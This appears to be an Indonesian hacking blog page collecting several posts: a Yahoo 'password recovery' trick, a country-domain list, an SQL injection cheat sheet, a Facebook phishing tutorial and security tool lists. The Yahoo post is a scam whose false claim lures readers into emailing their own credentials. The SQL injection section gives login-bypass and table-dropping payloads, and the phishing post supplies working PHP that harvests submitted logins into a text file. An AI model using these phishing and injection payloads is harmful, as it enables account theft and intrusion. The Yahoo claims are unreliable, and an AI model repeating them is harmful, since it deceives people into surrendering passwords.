Yahoo Mail Crack

2 komentar
|–[2. Bugs pada Yahoo Mail
—————————
Yahoo Mail (http://mail.yahoo.com) memiliki sistem pertahanan yang cukup tangguh. Disamping itu, tampilan mailbox yang menawan dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan penyedia layanan email berbasis web gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Yahoo!
Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna Yahoo Mail bisa sedikit berlega hati karena Yahoo telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:
1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.
Keempat hal diatas telah cukup untuk membuat banyak para kiddies harus gigit jari karena serangan session hijacking akan sangat-sangat sulit untuk dilakukan (karena ketidakmampuan mereka tentunya dan pengecualian bagi kaum elite Razz)
Tapi bagi kamu yang sangat-sangat bernafsu untuk bisa menembus email yahoo orang lain kini bisa sedikit terhibur karena telah ada sebuah bugs baru pada Yahoo. Yahoo memiliki sebuah alamat email special yang otomatis dikendalikan oleh mesin yang jika kita kirimkan sebuah nilai “uid” trenkripsi kepada alamat itu bersama alamat email korban, maka kamu akan memperoleh balasan email otomatis yang berisi password korban )

|–[3. Memanfaatkan Bugs
Sudah gak sabar yach… ) okay, sekarang ikuti langkah-langkah berikut:
Sign in lah kedalam account kamu terlebih dahulu, kemudian dengan perasaan yang mendalam, tekan tombol [Compose]/[tulis surat] untuk menulis email.
Pada form isian to: masukkan alamat berikut: webmasterautoresponse11.4111@yahoo.com
Alamat inilah yang saya sebutkan sebagai alamat special tadi. Sebenarnya alamat ini hanya boleh diketahui oleh para admin Yahoo saja, namun yeah.. kini alamat mematikan ini telah jatuh ke tangan kita )
Pada form cc dan bcc, kosongi saja kedua form tersebut sedangkan pada form Subject ketik “uid” tanpa tanda kutip.
Pada form message (pesan), ketik kode UID berikut:
mail.yahoo.com FALSE/FALSE 1020114252
6d 61 69 6c 6e 10 : alamat email kamu
C7 CB C3 C6 84 C9 : password kamu
6C 61 6D 65 72 69 : alamat email korban
Setelah itu tekan tombol send. Dan tunggulah dalam beberapa hari kamu akan menerima email balasan yang berisi password korban dan informasi-informasi mengenai korban seperti secreet question yang dipakai korban beserta jawabannya dan tanggal lahir korban )

Contohnya: misalkan alamat email kamu adalah elite@yahoo.com dan password kamu 3l1t3b3n3r4n dan alamat email korban korban@yahoo.com maka susunannya adalah sebagai berikut:
to: webmasterautoresponse11.4111@yahoo.com
cc:
bcc:
Subject: uid
message:
mail.yahoo.com FALSE/FALSE 1020114252
6d 61 69 6c 6e 10 : elite@yahoo.com
C7 CB C3 C6 84 C9 : 3l1t3b3n3r4n
61 6D 6C 65 72 69 : korban@yahoo.com

Daftar Nama Domain Di Seluruh Dunia

2 komentar
A
.ac – Pulau Ascension *
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afganistan
.ag – Antigua dan Barbuda *
.ai – Anguilla
.al – Albania
.am – Armenia *
.an – Antillen Belanda
.ao – Angola
.aq – Antartika
.ar – Argentina
.as – Samoa Amerika *
.at – Austria *
.au – Australia
.aw – Aruba
.ax – Ã…land
.az – Azerbaijan

B
.ba – Bosnia Herzegovina
.bb – Barbados
.bd – Bangladesh
.be – Belgia *
.bf – Burkina Faso
.bg – Bulgaria
.bh – Bahrain
.bi – Burundi *
.bj – Benin
.bm – Bermuda
.bn – Brunei Darussalam
.bo – Bolivia *
.br – Brasil *
.bs – Bahama *
.bt – Bhutan
.bv – Pulau Bouvet (tidak dipakai dan tidak terdaftar)
.bw – Botswana
.by – Belarus
.bz – Belize *
C
.ca – Kanada
.cc – Pulau Cocos *
.cd – Republik Demokratik Kongo (dulunya .zr – Zaire) *
.cf – Republik Afrika Tengah
.cg – Republik Kongo *
.ch – Swiss *
.ci – Côte d’Ivoire (Pantai Gading)
.ck – Kepulauan Cook *
.cl – Chili
.cm – Kamerun
.cn – Republik Rakyat Tiongkok *
.co – Kolombia
.cr – Kosta Rika
.cs – Serbia dan Montenegro (dulunya .yu – Yugoslavia; Catatan: pada tanggal 3 Juni, 2006, Montenegro mendeklarasikan kemerdekaannya, sehingga domain ini tidak dipakai lagi.) (kode domain .cs tidak dipakai, tidak ada DNS) (kode domain .cs dulunya dipakai untuk Cekoslowakia)
.cu – Kuba
.cv – Tanjung Verde
.cx – Pulau Natal *
.cy – Siprus
.cz – Republik Ceko
D
.de – Jerman
.dj – Djibouti *
.dk – Denmark *
.dm – Dominika
.do – Republik Dominika
.dz – Aljazair (Algeria)
E
.ec – Ekuador
.ee – Estonia
.eg – Mesir
.eh – Sahara Barat (tidak dipakai; tidak ada DNS)
.er – Eritrea
.es – Spanyol *
.et – Ethiopia
.eu – Uni Eropa (kode domain yang "dikhususkan" oleh ISO 3166-1)
F
.fi – Finlandia
.fj – Fiji *
.fk – Kepulauan Falkland
.fm – Federasi Mikronesia *
.fo – Kepulauan Faroe
.fr – Perancis
G
.ga – Gabon
.gb – Britania Raya (Reserved domain by IANA; deprecated – see .uk)
.gd – Grenada
.ge – Georgia
.gf – Guyana Perancis
.gg – Guernsey
.gh – Ghana
.gi – Gibraltar
.gl – Greenland *
.gm – Gambia
.gn – Guinea
.gp – Guadeloupe
.gq – Guinea Khatulistiwa
.gr – Yunani *
.gs – Georgia Selatan dan Kepulauan Sandwich Selatan *
.gt – Guatemala
.gu – Guam
.gw – Guinea Bissau
.gy – Guyana
H
.hk – Hong Kong *
.hm – Pulau Heard dan Kepulauan McDonald *
.hn – Honduras *
.hr – Kroasia
.ht – Haiti
.hu – Hongaria *
I
.id – Indonesia
.ie – Republik Irlandia
.il – Israel *
.im – Pulau Man *
.in – India *
.io – Teritorial Britania di Samudra Hindia *
.iq – Irak
.ir – Iran *
.is – Islandia
.it – Italia
J
.je – Jersey
.jm – Jamaika
.jo – Yordania
.jp – Jepang
K
.ke – Kenya
.kg – Kirgizstan
.kh – Kamboja
.ki – Kiribati
.km – Komoro
.kn – Saint Kitts dan Nevis
.kp – Korea Utara (tidak dipakai; tidak ada DNS)
.kr – Korea Selatan
.kw – Kuwait
.ky – Kepulauan Cayman
.kz – Kazakhstan *
L
.la – Laos *
.lb – Lebanon
.lc – Saint Lucia
.li – Liechtenstein *
.lk – Sri Lanka
.lr – Liberia
.ls – Lesotho
.lt – Lituania
.lu – Luxemburg
.lv – Latvia *
.ly – Libya *
M
.ma – Maroko
.mc – Monako
.md – Moldova *
.me – Montenegro
.mg – Madagaskar
.mh – Kepulauan Marshall
.mk – Republik Makedonia
.ml – Mali
.mm – Myanmar
.mn – Mongolia *
.mo – Makau
.mp – Kepulauan Mariana Utara *
.mq – Martinique
.mr – Mauritania
.ms – Montserrat *
.mt – Malta
.mu – Mauritius *
.mv – Maladewa
.mw – Malawi *
.mx – Meksiko *
.my – Malaysia
.mz – Mozambik
N
.na – Namibia *
.nc – Kaledonia Baru
.ne – Niger
.nf – Pulau Norfolk *
.ng – Nigeria
.ni – Nikaragua
.nl – Belanda * (ccTLD terdaftar pertama)
.no – Norwegia
.np – Nepal
.nr – Nauru *
.nu – Niue *
.nz – Selandia Baru *
O
.om – Oman
P
.pa – Panama
.pe – Peru
.pf – Polinesia Perancis
.pg – Papua Nugini
.ph – Filipina *
.pk – Pakistan *
.pl – Polandia *
.pm – Saint-Pierre dan Miquelon
.pn – Kepulauan Pitcairn *
.pr – Puerto Riko *
.ps – Otoritas Nasional Palestina *
.pt – Portugal *
.pw – Palau
.py – Paraguay
Q
.qa – Qatar
R
.re – Réunion
.ro – Rumania *
.rs – Serbia
.ru – Rusia *
.rw – Rwanda
S
.sa – Arab Saudi
.sb – Kepulauan Solomon *
.sc – Seychelles *
.sd – Sudan
.se – Swedia *
.sg – Singapura
.sh – Saint Helena *
.si – Slovenia
.sj – Svalbard dan Jan Mayen (tidak dipakai; tidak terdaftar)
.sk – Slowakia
.sl – Sierra Leone
.sm – San Marino *
.sn – Senegal
.so – Somalia *
.sr – Suriname *
.st – Sao Tome dan Principe *
.su – Uni Soviet (terdepresiasi; digantikan; kode domain "dipakai untuk pergantian" oleh ISO 3166-1)
.sv – El Salvador
.sy – Suriah *
.sz – Swaziland *
T
.tc – Kepulauan Turks dan Caicos
.td – Chad
.tf – Teritorial Perancis Selatan
.tg – Togo *
.th – Thailand
.tj – Tajikistan *
.tk – Tokelau *
.tl – Timor Leste (dulunya .tp) *
.tm – Turkmenistan *
.tn – Tunisia
.to – Tonga *
.tp – Timor Timur (terdepresiasi – gunakan .tl; kode domain "dipakai untuk pergantian" oleh ISO 3166-1)
.tr – Turki
.tt – Trinidad dan Tobago *
.tv – Tuvalu *
.tw – Republik China (Taiwan) *
.tz – Tanzania
U
.ua – Ukraina
.ug – Uganda *
.uk – Inggris (kode domain yang "dikhususkan" oleh ISO 3166-1) (lihat pula .gb)
.us – Amerika Serikat *
.uy – Uruguay
.uz – Uzbekistan
V
.va – Vatikan
.vc – Saint Vincent dan Grenadines *
.ve – Venezuela
.vg – Kepulauan Virgin Britania Raya *
.vi – Kepulauan Virgin Amerika Serikat
.vn – Vietnam
.vu – Vanuatu *
W
.wf – Wallis dan Futuna
.ws – Samoa (dulunya Samoa Barat) *
Y
.ye – Yaman
.yt – Mayotte
.yu – Yugoslavia (kemudian berganti nama menjadi Serbia dan Montenegro)
(kode domain secara resmi digantikan oleh .cs (lihat di atas) namun tetap dipakai; kode domain "dipakai untuk pergantian" oleh ISO 3166-1)
Z
.za – Afrika Selatan *
.zm – Zambia
.zw – Zimbabwe
Tidak bersponsor
.biz .com .edu .gov .info .int .mil .name .net .org
Bersponsor
.aero .cat .coop .jobs .mobi .museum .pro .tel .travel
Infrastruktur
.arpa .root
Startup phase
.asia
Diusulkan
.berlin .bzh .cym .gal .geo .kid .kids .mail .nyc .post .sco .web .xxx
Dihapus
.nato
Dipesan
.example .invalid .localhost .test
Pseudo-domain
.bitnet .csnet .ip .local .onion .uucp

Simple SQL Injection Advance

1 komentar
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.

+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:

SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya

3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–

4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)

5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist

6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:

SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel

Facebook Phising For Newbie

5 komentar
Today we are going to make a phisher for facebook.

1) go to facebook, and view the source, copy all the text to notepad.
2) we need to change some codes so press: Control + F
3) search for action
4) You should get: action=www.facebook.com/login and bla bla bla
5) delete all the facebook.com crap, and put: lol.php
6) beside action you will see something saying: method=post
7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change it to “all files” this is very important
9) make a new file in notepad, and put this code:

<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

10) now save it as lol.php and remember the save as file type to all files.
11) now, make a new file in notepad, dont write anything, save it as: passwords.txt
12) now upload all of them in http://yourhosting.com

Hacker Tools

3 komentar
WINDOWS

[Passwords] Windows Password Reset Professional 8.0
[Programming] WinGuard Pro 2010 Lite 7.5
[Access Control] Win Control 2007 7.400
[Passwords] Project Password 1.3
[Passwords] ThunderbirdPassDecryptor 1.0
[Encryption] Kotak 1.0
[Passwords] Atomic Zip Password Cracker 2.60
[Scanners] cvechecker-0.2
[Passwords] RoboForm Enterprise 7.0.66 Beta / 6.10.0


_________________________________________________________________________________
LINUX
 
[Programming] listener-2.0.0
[Various] puck.iso
[Networking] tmac-v1.0-beta
[Programming] hashkill-0.2.2
[Programming] kmotion_2.11_Beta
[Firewalls] webfwlog-0.94
[Various] ext3secdel alpha
[Networking] NetSlaughter
[Encryption] bcm58xx 2.03
[Various] buck-security 0.5 
 
_________________________________________________________________________________
MAC OS X
 
[Networking] netifera-1.0-macosx
[Monitoring] Aobo Mac OS X Keylogger 1.0
[Access Control] Adeona For Mac 0.2.1a
[Wireless] Gemaad 9.12
[Passwords] KeePassX 0.4.0
[Passwords] KeyChainDD 0.9.0.0
[Various] Thief Hunter 0.1.1b
[Encryption] MySecureShell SFTP-Server 1.1
[Scanners] MacScan 2.5
[Firewalls] The DoorStop X Security Suite 2.2
 
_________________________________________________________________________________
POCKET PC
 
[Monitoring] Moo0 FileMonitor Portable 1.02
[Monitoring] Activity Reporter 1.0.0
[Antivirus] Emsisoft HiJackFree 4.0.0.29
[Passwords] PC Tools Password Utilities 1.0.0.5
[Antivirus] IBM Assured Execution Environment 2.27
[Monitoring] ELimit 2.0.4
[Monitoring] USBSpy (64-bit) 2.0.1
[Antivirus] M Autorun Killer Smart 2.1
[Antivirus] NoVirusThanks Malware Remover 2.7
[Scanners] NoVirusThanks Uploader 2.4.1   
 
_________________________________________________________________________________
ASSESSMENT 
 
[Exploits] Windows Shortcut Exploit Protection Tool 1.0.0
[Exploits] exploitation-arm
[Windows] ostinato-bin-win32-0.1.1
[Windows] ostinato-src-0.1.1
[Unix] devshell.zip
[Windows] ScoopyNG
[Windows] ReFrameworker-1.1
[Cisco] ctm-0.2.0
[Unix] Ravage
[Windows] reglookup-0.12.0
 
_________________________________________________________________________________
DEFENSE
 
Cryptography] CryptoHeaven (64-Bit) 3.2.3 build 564
[Firewall and IDS] suricata-1.0.1
[Cryptography] crypters
[Unix] pwnat-0.2-beta
[Unix] khc_0.2
[Packet Sniffers] Live Messenger Sniffer 1.0.1.16
[Cryptography] HardenSSL
[Unix] keimpx-0.2
[Cryptography] sslaudit
[Packet Sniffers] netsniff-ng-0.5.4.1 
 
_________________________________________________________________________________
PAPERS
 
[Security] Injector.pdf
[Security] metasploit-review.pdf
[Security] how_to_attack_and_fix_local_file_disclosure.pdf
[Security] m0t-krb5-08-2010.pdf
[Security] transparent-medical-devices.pdf
[Security] CVP-HackersPerspective.pdf
[Security] newbieguide-2.pdf
[Security] DNSBotnet2010cyberwar.pdf
[Security] DigitalWhisper10.pdf
[Security] draft-gont-timestamps-generation-00.pdf 
 
_________________________________________________________________________________
MISCELLANEOUS 
 
 
[Remote and Trojans] weevely-r54
[Remote and Trojans] Wimp 2.0
[Remote and Trojans] RWW-Attack-0.9.2
[Anonymity] JonDo 00.12.005
[mobile phones] PhoneWallet 1.0.0
[Group Releases] Driver Sweeper 2.1.0
[Anonymity] Proxymizer 1.0
[Remote and Trojans] STL WebDl v0.1
[Remote and Trojans] Nemesis Remote Desktop 1.0
[Wireless Security] epassport_emulator_v1.02
More Info With http://www.hacker-soft.net/

Top 100 Network Security Tools

3 komentar
After the tremendously successful 2000 and 2003 security tools surveys, Insecure.Org is delighted to release this 2006 survey. I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”.


Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones.
Each tool is described by one ore more attributes:
newDid not appear on the 2003 list
/Popularity ranking rose / fell the given number since the 2003 survey
  TITLE=Generally costs money. A free limited/demo/trial version may be available.
LinuxWorks natively on Linux
*BSDWorks natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants
OS XWorks natively on Apple Mac OS X
WindowsWorks natively on Microsoft Windows
Command-line interfaceFeatures a command-line interface
GUI InterfaceOffers a GUI (point and click) interface
Source codeSource code available for inspection.
Please send updates and suggestions (or better tool logos) to Fyodor. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our link banners. Here is the list, starting with the most popular:


#1
  TITLE=
Linux
*BSD
OS X
Windows
GUI Interface
Nessus : Premier UNIX vulnerability assessment tool
Nessus was a popular free and open source vulnerability scanner until they closed the source code in 2005 and removed the free "registered feed" version in 2008. A limited “Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the “Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. See all vulnerability scanners

#2
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Wireshark : Sniffing the glue that holds the Internet together
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences). See all packet sniffers

#3
  TITLE=
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Snort : Everyone's favorite open source IDS
This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts. Open source Snort works fine for many individuals, small businesses, and departments. Parent company SourceFire offers a complimentary product line with more enterprise-level features and real-time rule updates. They offer a free (with registration) 5-day-delayed rules feed, and you can also find many great free rules at Bleeding Edge Snort.
See all intrusion detection systems

#4
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Netcat : The network Swiss army knife
This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits. There is also Chris Gibson's Ncat, which offers even more features while remaining portable and compact. Other takes on Netcat include OpenBSD's nc, Cryptcat, Netcat6, PNetcat, SBD, and so-called GNU Netcat. See all Netcats

#5
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Metasploit Framework : Hack the Planet
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses. See all vulnerability exploitation tools

#6
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Hping2 : A network probing utility like ping on steroids
This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols. See all packet crafting tools

#7
10
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Kismet : A powerful wireless sniffer
Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating, ... See all wireless tools, and packet sniffers

#8
3
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Tcpdump : The classic sniffer for network monitoring and data acquisition
Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene, and many of us continue to use it frequently. It may not have the bells and whistles (such as a pretty GUI or parsing logic for hundreds of application protocols) that Wireshark has, but it does the job well and with fewer security holes. It also requires fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library, which is used by Nmap among many other tools. See all packet sniffers

#9
23
Windows
GUI Interface
Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented. See all password crackers, and packet sniffers

#10
1
Linux
*BSD
OS X
Windows
Command-line interface
Source code
John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here. See all password crackers

#11
2
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Ettercap : In case you still thought switched LANs provide much extra security
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN. See all packet sniffers

#12
4
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Nikto : A more comprehensive web scanner
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected. See all web vulnerability scanners

#13
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Ping/telnet/dig/traceroute/whois/netstat : The basics
While there are many whiz-bang high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although for more advanced usage you may be better off with Hping2 and Netcat.

#14
2
Linux
*BSD
OS X
Windows
Command-line interface
Source code
OpenSSH / PuTTY / SSH : A secure way to access remote computers
SSH (Secure Shell) is the now ubiquitous program for logging into or executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network, replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX users run the open source OpenSSH server and client. Windows users often prefer the free PuTTY client, which is also available for many mobile devices. Other Windows users prefer the nice terminal-based port of OpenSSH that comes with Cygwin. Dozens of other free and proprietary clients exist. You can explore them here or here.

#15
35
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
THC Hydra : A Fast network authentication cracker which supports many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC. See all password crackers

#16
new
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Paros proxy : A web application vulnerability assessment proxy
A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting. See all web vulnerability scanners

#17
10
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Dsniff : A suite of powerful network auditing and penetration-testing tools
This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. A separately maintained partial Windows port is available here. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs. See all packet sniffers

#18
7
Windows
GUI Interface
NetStumbler : Free Windows 802.11 Sniffer
Netstumbler is the best known Windows tool for finding open wireless access points ("wardriving"). They also distribute a WinCE version for PDAs and such named Ministumbler. The tool is currently free but Windows-only and no source code is provided. It uses a more active approach to finding WAPs than passive sniffers such as Kismet or KisMAC. See all wireless tools, and packet sniffers

#19
18
Linux
*BSD
OS X
Windows
Command-line interface
Source code
THC Amap : An application fingerprinting scanner
Amap is a great tool for determining what application is listening on a given port. Their database isn't as large as what Nmap uses for its version detection feature, but it is definitely worth trying for a 2nd opinion or if Nmap fails to detect a service. Amap even knows how to parse Nmap output files. This is yet another valuable tool from the great guys at THC. See all application-specific scanners

#20
12
  TITLE=
Windows
GUI Interface
GFI LANguard : A commercial network security scanner for Windows
GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. It also tries to collect Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches. A free trial version is available, though it only works for up to 30 days. See all vulnerability scanners

#21
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files). See all wireless tools, and password crackers

#22
4
Windows
GUI Interface
Superscan : A Windows-only port scanner, pinger, and resolver
SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois. See all port scanners

#23
2
Linux
Command-line interface
Source code
Netfilter : The current Linux kernel packet filter/firewall
